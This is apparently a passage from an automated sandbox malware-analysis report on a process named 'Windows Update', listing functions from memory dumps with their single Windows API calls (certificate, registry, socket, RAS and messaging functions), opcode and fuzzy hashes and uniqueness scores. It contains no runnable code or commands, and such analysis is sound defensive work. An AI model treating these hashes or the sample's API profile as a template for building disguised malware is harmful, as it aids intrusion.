                                                                                                                    • Instruction ID: 4a4604f4cd24976d050098460f9880f031af2ef92971e5cd96c73a425cf953b7
                                                                                                                    • Opcode Fuzzy Hash: 7acbef2f745f0dffa2213fc7398d24f919b35b6bab84e7f1b6f529638a3a9eb2
                                                                                                                    • Instruction Fuzzy Hash: C9019E715046409FDB20CF29D88576AFBD8EF05620F1CC4AADD49CF786D675E508CBA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05522C9A Relevance: 1.5, APIs: 1, Instructions: 47encryptionCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CertGetCertificateChain.CRYPT32(?,00000E2C,?,?), ref: 05522CEA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CertCertificateChain
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3019455780-0
                                                                                                                    • Opcode ID: de664aa8efad7bba4d85d0b7aa44fdbd43d13853f78c02178ba5ae69309929d7
                                                                                                                    • Instruction ID: b963fe730000a7d819f3b8442c270b9962b74b6ffd154b213d9f4164f6229d83
                                                                                                                    • Opcode Fuzzy Hash: de664aa8efad7bba4d85d0b7aa44fdbd43d13853f78c02178ba5ae69309929d7
                                                                                                                    • Instruction Fuzzy Hash: F0017C71900600ABD710DF1ADC86B26FBA8EF88B20F14816AED089B741E235F915CBE5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 055200DE Relevance: 1.5, APIs: 1, Instructions: 46libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadLibraryShim.MSCOREE(?,?,?,?), ref: 05520129
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LibraryLoadShim
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1475914169-0
                                                                                                                    • Opcode ID: da74f97b722e09e30f3bced608adff7958613396619be12980499e2ec88e7f6d
                                                                                                                    • Instruction ID: 82d2b365a5ba873a12a683b61bfc42092a8d7de8ad20af89a42c32a7fcd8a6af
                                                                                                                    • Opcode Fuzzy Hash: da74f97b722e09e30f3bced608adff7958613396619be12980499e2ec88e7f6d
                                                                                                                    • Instruction Fuzzy Hash: 960192715016009FDB60CF1ADC89B22FBE4FF15610F08C49ADD498B7A5D275E408CB71
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0552605E Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetDriveTypeW.KERNEL32(?,EA433468,00000000,?,?,?,?,?,?,?,?,72343C38), ref: 05526098
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DriveType
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 338552980-0
                                                                                                                    • Opcode ID: 972d732ab811e06c689e0ce838eba57588741867b3aad6bc988245b427a7b356
                                                                                                                    • Instruction ID: 9ef6cd204c29366c061aad863be96e0a5e2d7b88c5579b48d2ed739dcf3ff5a9
                                                                                                                    • Opcode Fuzzy Hash: 972d732ab811e06c689e0ce838eba57588741867b3aad6bc988245b427a7b356
                                                                                                                    • Instruction Fuzzy Hash: 250144715042409FD720CF19D885766FBD4FF05620F18C4AADD499F246D675F508DB62
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0552173A Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • RegQueryValueExW.KERNEL32(?,00000E2C,?,?), ref: 0552178A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: QueryValue
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3660427363-0
                                                                                                                    • Opcode ID: 05c5576dd00adee5da7629f6f2c6a9caae49c4272ea7c500cf460c6e0da0ed1b
                                                                                                                    • Instruction ID: 52130b101e5a18ab6e956c8dc094be8daf76ab7d3d21e331b0558d335d3369a6
                                                                                                                    • Opcode Fuzzy Hash: 05c5576dd00adee5da7629f6f2c6a9caae49c4272ea7c500cf460c6e0da0ed1b
                                                                                                                    • Instruction Fuzzy Hash: BF016D71500600ABD610DF1ADC86B26FBA8FF88B20F14815AED585B741E375F915CBE6
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 055207F2 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • RasEnumConnectionsW.RASAPI32(?,00000E2C,?,?), ref: 05520842
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ConnectionsEnum
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3832085198-0
                                                                                                                    • Opcode ID: 292bc7b1bf0916ced4530d97b16006263af5daf8806f007f05ea875eb97de952
                                                                                                                    • Instruction ID: 61849b05c2bcfbf0195e035d30aa18b73c20fed6e253df4b66f11acb1d5badd4
                                                                                                                    • Opcode Fuzzy Hash: 292bc7b1bf0916ced4530d97b16006263af5daf8806f007f05ea875eb97de952
                                                                                                                    • Instruction Fuzzy Hash: EA016D71500600ABD610DF1ADC86B26FBA8FF88B20F14816AED585B741E275F915CBE6
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05521AB2 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • setsockopt.WS2_32(?,?,?,?,?), ref: 05521AF0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: setsockopt
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3981526788-0
                                                                                                                    • Opcode ID: c674e118a06e8c604ded86755c7a6ead29506c94e953572c125656124b4e161d
                                                                                                                    • Instruction ID: a7bc6d24ff7889f8fb01b3b523bcb00d8094390720c5110d196d81a0d2140afa
                                                                                                                    • Opcode Fuzzy Hash: c674e118a06e8c604ded86755c7a6ead29506c94e953572c125656124b4e161d
                                                                                                                    • Instruction Fuzzy Hash: D9018C314006409FDB21CF55D844B66FBA4FF49321F18C8AADD898F652D275A018CBA2
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0552610A Relevance: 1.5, APIs: 1, Instructions: 42windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • PostMessageW.USER32(?,?,?,?), ref: 05526145
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePost
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 410705778-0
                                                                                                                    • Opcode ID: 61bf6f717d18d626c3d4184e57e61ce926bddf3ed7a27444bb56112dfe6eb988
                                                                                                                    • Instruction ID: 3f7f4c5eea1d23db7570a15fbc629793b2533a03a389670a4e041aff38c42514
                                                                                                                    • Opcode Fuzzy Hash: 61bf6f717d18d626c3d4184e57e61ce926bddf3ed7a27444bb56112dfe6eb988
                                                                                                                    • Instruction Fuzzy Hash: FA0171355006409FDB218F16DC45B65FBA4FF09320F18C49EDD454B6A2D675A458CFA2
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0552157A Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • FindClose.KERNEL32(?,EA433468,00000000,?,?,?,?,?,?,?,?,72343C38), ref: 055215AC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseFind
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1863332320-0
                                                                                                                    • Opcode ID: 3c75af0b8ece555529813b9c2959de6ea2e29f7ba274b4fb579ceca9bba4ddbd
                                                                                                                    • Instruction ID: 1cd7ed06d01447114ba0ee0927a65e0ffac3e3b8ac6bbacf0eafaef7a7e67f46
                                                                                                                    • Opcode Fuzzy Hash: 3c75af0b8ece555529813b9c2959de6ea2e29f7ba274b4fb579ceca9bba4ddbd
                                                                                                                    • Instruction Fuzzy Hash: BE01D635600A409FD7208F19D884766FBE4EF05621F18C0EFDD464B395D675E508CFA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05525FBE Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,EA433468,00000000,?,?,?,?,?,?,?,?,72343C38), ref: 05525FF0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CallbackDispatcherUser
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2492992576-0
                                                                                                                    • Opcode ID: 2a8280139698925a424ab5360a7ea54e4591450b5aa8b1bef2afc1b44a50f672
                                                                                                                    • Instruction ID: c3671f8d09c7b055ba3bac105b79dd3b26f75ac6537d683ade6cd29ca3b85c7d
                                                                                                                    • Opcode Fuzzy Hash: 2a8280139698925a424ab5360a7ea54e4591450b5aa8b1bef2afc1b44a50f672
                                                                                                                    • Instruction Fuzzy Hash: 3301D1755047409FD720CF19D884B66FBE4EF05720F18C0AADD4A8B696D6B5E408CFB2
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 012BA8AE Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.358449792.00000000012BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_12ba000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: closesocket
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2781271927-0
                                                                                                                    • Opcode ID: 23937e3f4647c60d8a6e73dd10fb1e40fb77117936754bfc0c01715773424685
                                                                                                                    • Instruction ID: 981254413ee06cd8743fe28a1bb8163e34cbc537bd689b799e03ba3ba02f4489
                                                                                                                    • Opcode Fuzzy Hash: 23937e3f4647c60d8a6e73dd10fb1e40fb77117936754bfc0c01715773424685
                                                                                                                    • Instruction Fuzzy Hash: A701A274410640AFDB20CF19D8857A6FBA4DF04320F18C4EBDD488F216D2B5A548CF61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05521002 Relevance: 1.5, APIs: 1, Instructions: 38windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(?,?,?,?), ref: 0552103D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3850602802-0
                                                                                                                    • Opcode ID: e02c6eff5ebc941eb9cc2473b765147a1c0aab5c1b03d5221ce52bfb1df9bf28
                                                                                                                    • Instruction ID: a31e69ee6751a243d4f1f295270ab5a8fc931899c0c486f4d3dbf61fa981a395
                                                                                                                    • Opcode Fuzzy Hash: e02c6eff5ebc941eb9cc2473b765147a1c0aab5c1b03d5221ce52bfb1df9bf28
                                                                                                                    • Instruction Fuzzy Hash: 60018F35400A80DFDB20CF05D884B26FBA0FF09720F18C49ADD850B652D276B418CFB2
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0552632A Relevance: 1.5, APIs: 1, Instructions: 35windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • DispatchMessageW.USER32(?), ref: 0552635C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DispatchMessage
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2061451462-0
                                                                                                                    • Opcode ID: c27bf487806ebbd24e7a04a44e284e8285773b994fc289bc57278ca178bfca28
                                                                                                                    • Instruction ID: 5fd006351239b758ce5fc270337006c8997b82108f285792c0a783fb5f36f573
                                                                                                                    • Opcode Fuzzy Hash: c27bf487806ebbd24e7a04a44e284e8285773b994fc289bc57278ca178bfca28
                                                                                                                    • Instruction Fuzzy Hash: 52F0AF344046409FDB20CF09D884765FBA0FF1A721F18C4DADD494B296D6B9A408CFA2
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 012CB354 Relevance: .1, Instructions: 52COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.358506185.00000000012CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CA000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_12ca000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 10eb81a175aee19bf21422fe8b65566e0bfe104a32e64b08c707258a35be62c9
                                                                                                                    • Instruction ID: 72c3d6cf949aec150e71d437e4d3a8c2dd2e215e12fb346cf9e185fda5b3035b
                                                                                                                    • Opcode Fuzzy Hash: 10eb81a175aee19bf21422fe8b65566e0bfe104a32e64b08c707258a35be62c9
                                                                                                                    • Instruction Fuzzy Hash: 8311ECB5508301AFD350CF09DC40A5BFBE8EB98660F14C96EFD9897311D235E9048FA2
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 012CB3A3 Relevance: .0, Instructions: 26COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.358506185.00000000012CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CA000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_12ca000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d136964243108ba40a30de6792017a2d64c54745443b4fd98b5c2ad2b76697fd
                                                                                                                    • Instruction ID: 47766c10fb85ef2379e36d2350938247cc1e69afa36709e14ce1bf5ff662c9e0
                                                                                                                    • Opcode Fuzzy Hash: d136964243108ba40a30de6792017a2d64c54745443b4fd98b5c2ad2b76697fd
                                                                                                                    • Instruction Fuzzy Hash: 59E0D87254070467D2209F0A9C41B22FB98DB54A31F14C567ED081B302E175B504CAF5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 012B23F4 Relevance: .0, Instructions: 15COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.358424879.00000000012B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B2000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_12b2000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 4d599cf2b90ee7f6e18f77a1d3de3bffece70b4a745fc9f2eddf2ac571a0be14
                                                                                                                    • Instruction ID: f7547bdcdc85a4f3503f11009a33a4da1eb97938771802f811ca66c145d0c270
                                                                                                                    • Opcode Fuzzy Hash: 4d599cf2b90ee7f6e18f77a1d3de3bffece70b4a745fc9f2eddf2ac571a0be14
                                                                                                                    • Instruction Fuzzy Hash: DAD05B752157918FD3268A1CC1A5BD53FB4EF51705F4644F9D9008B667C358E5C1D100
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 012B23BC Relevance: .0, Instructions: 14COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.358424879.00000000012B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B2000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_12b2000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 38175a759ad0eaeace9d231ff7750202b77f63b093150f72feed798a8a0aac92
                                                                                                                    • Instruction ID: 1c465799a4511a4e39b0c769dc03f68d0368e742a4ca93fecdcd1634eac51836
                                                                                                                    • Opcode Fuzzy Hash: 38175a759ad0eaeace9d231ff7750202b77f63b093150f72feed798a8a0aac92
                                                                                                                    • Instruction Fuzzy Hash: 18D05E342113828BD725DB1CC5D4F993BD4AB41B00F0644E8BD008B662C3A4E8C1C600
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%